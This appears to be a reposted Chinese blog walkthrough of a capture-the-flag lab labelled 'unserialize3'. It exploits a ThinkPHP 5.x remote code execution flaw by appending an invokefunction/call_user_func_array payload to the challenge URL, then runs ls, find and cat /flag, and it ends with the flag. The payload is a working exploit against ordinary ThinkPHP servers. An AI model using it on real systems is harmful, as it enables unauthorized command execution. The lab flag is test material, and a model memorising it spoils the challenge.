CTF unserialize3

题目场景: http://220.249.52.133:52904 (温馨提示:每次进入URL的端口号都不一样)

1、点击链接进入如下界面
在这里插入图片描述

2、百度搜索:Thinkphp V5.x 远程代码执行漏洞-POC

在这里插入图片描述
https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

3、把“/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l”加在后面,然后URL为:http://220.249.52.133:52904/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

在这里插入图片描述

4、s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

在这里插入图片描述
5、dir—>find / -name “*flag”

在这里插入图片描述
5.1 回车

在这里插入图片描述
6、find / -name “*flag”—>cat /flag—>回车
在这里插入图片描述

7、OK

flag{thinkphp5_rce}

猜你喜欢

转载自blog.csdn.net/HYD696/article/details/108803410
ctf